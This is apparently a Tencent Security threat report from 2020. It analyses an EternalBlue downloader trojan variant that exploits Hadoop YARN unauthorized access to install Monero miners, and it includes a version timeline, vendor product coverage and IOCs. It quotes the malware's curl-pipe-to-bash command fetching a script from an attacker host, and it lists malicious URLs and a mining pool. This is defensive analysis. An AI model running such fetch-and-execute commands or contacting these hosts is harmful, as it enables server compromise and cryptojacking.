永恒之蓝木马下载器再更新,云上主机成为新目标

2020-10-28 19:08:52
腾讯安全威胁情报中心检测到永恒之蓝下载器木马新增利用Hadoop Yarn未授权访问漏洞攻击。该变种入侵Linux服务器后下载门罗币挖矿木马,然后将挖矿任务进行持久化、清除竞品挖矿木马,并通过SSH爆破横向移动。

一、背景

腾讯安全威胁情报中心检测到永恒之蓝下载器木马新增利用Hadoop Yarn未授权访问漏洞攻击。该变种入侵Linux服务器后下载门罗币挖矿木马,然后将挖矿任务进行持久化、清除竞品挖矿木马,并通过SSH爆破横向移动。

永恒之蓝下载器木马自2018年底出现以来,一直处于活跃状态。该病毒不断变化和更新攻击手法,从最初只针对Windows系统扩大攻击范围到Linux系统。截止目前,其攻击手法已涵盖弱口令爆破、系统漏洞利用、Web漏洞利用等,其中利用SSHRedisHadoop Yarn服务的攻击方式可能对云主机以及云上业务造成较大威胁。其主要入侵方式列表如下:

攻击目标系统

Windows

Linux

主要攻击手法

Lnk漏洞CVE-2017-8464(通过移动设备)

SSH爆破

office漏洞CVE-2017-8570(通过钓鱼邮件)

Redis未授权访问漏洞

SMBGhost漏洞CVE-2020-0796

Hadoop Yarn未授权访问漏洞

永恒之蓝漏洞MS17-010

mssql爆破

RDP爆破

$IPC爆破

SMB爆破

腾讯安全系列产品针对永恒之蓝下载器木马最新变种的响应清单如下 :

应用

场景

安全产品

解决方案

腾讯T-Sec

威胁情报云查服务

SaaS

1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

Cloud FirewallCFW

基于网络流量进行威胁检测与主动拦截,已支持:

1)永恒之蓝漏洞MS17-010;

2SMBGhost漏洞CVE-2020-0796;

3Redis未授权访问漏洞;

4Hadoop Yarn未授权访问漏洞

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

Cloud Workload ProtectionCWP

已支持检测:

1)永恒之蓝漏洞MS17-010;

2SMBGhost漏洞CVE-2020-0796;

3Redis未授权访问漏洞;

4Hadoop Yarn未授权访问漏洞

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 网络资产风险监测系统

(腾讯御知)

1)腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796影响。

2)已集成无损检测POC,企业可以对自身资产进行远程检测。

关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

(腾讯御界)

基于网络流量进行威胁检测,已支持检测:

1)永恒之蓝漏洞MS17-010;

2SMBGhost漏洞CVE-2020-0796;

3Redis未授权访问漏洞;

4Hadoop Yarn未授权访问漏洞

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

腾讯T-Sec终端安全管理系统(御点)

1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序;

2)已支持检测黑产利用永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。

3)已支持检测利用Lnk漏洞CVE-2017-8464Office漏洞CVE-2017-8570攻击的病毒程序;

腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html

二、详细分析

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。

YARN提供有默认开放在80888090REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,攻击者可以在未授权的情况下远程执行代码。

永恒之蓝下载器木马变种在yarnexec()函数中对yarn未授权访问漏洞进行利用。



攻击成功后执行远程命令:

export src=yarn;curl -fsSL t.amynx.com/ln/core.png?yarn|bash

core.png首先下载门罗币挖矿木马d.ackng.com/ln/xr.zip并启动挖矿进程/.Xll/xr,然后添加crontab定时任务将挖矿作业持久化。


清除竞品挖矿木马:


利用SSH爆破进行横向移动:


永恒之蓝下载器木马历次版本更新情况如下:

时间

主要技术点

20181214

利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 

20181219

下载之后的木马新增Powershell后门安装。

201919

检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。

2019124

木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。

2019125

木马在124日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。

2019210

将攻击模块打包方式改为Pyinstaller

2019220

更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。

2019223

攻击方法再次更新,新增MsSQL爆破攻击。

2019225

223日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktazpsexec进行辅助攻击。

201936

通过已感染机器后门更新Powershell脚本横向传播模块ipc

201938

通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与20189月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。

2019314

通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。

2019328

更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMICPassthehash+SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。

201943

开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。

2019719

无文件攻击方法新增CVE-2017-8464Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。

2019109

新增Bluekeep漏洞CVE-2019-0708检测上报功能。

2020212

使用DGA域名,篡改hosts文件。

202043

新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570

2020417

钓鱼邮件新增附件readme.zipreadme.doc,新增BypassUAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘

2020521

新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。

2020610

新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。

2020624

重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe),负责永恒之蓝漏洞攻击、$IPCSMB爆破攻击。

2020818

新增利用Yarn未授权访问漏洞攻击Linux服务器

IOCs

URL

http[:]//d.ackng.com/ln/xr.zip

http[:]//t.amynx.com/ln/core.png

http[:]//t.amynx.com/ln/a.asp

http[:]//t.jdjdcjq.top/ln/a.asp


MD5

if.bin

888dc1ca4b18a3d424498244acf81f7d

a.jsp(powershell)

c21caa84b327262f2cbcc12bbb510d15

kr.bin

e04acec7ab98362d87d1c53d84fc4b03

core.png

e49367b9e942cf2b891f60e53083c938

a.jsp(shell) 

b204ead0dcc9ca1053a1f26628725850

gim.jsp

b6f0e01c9e2676333490a750e58d4464

矿池:

lplp.ackng.com:444 

参考链接:

1. Hadoop Yarn REST API未授权漏洞利用挖矿分析

https://www.freebuf.com/vuls/173638.html

2. 关于Apache Hadoop Yarn资源管理系统REST API未授权漏洞通知

https://bbs.qcloud.com/thread-50090-1-1.html

3. 永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器

https://s.tencent.com/research/report/1038.html

4.https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py

最新资讯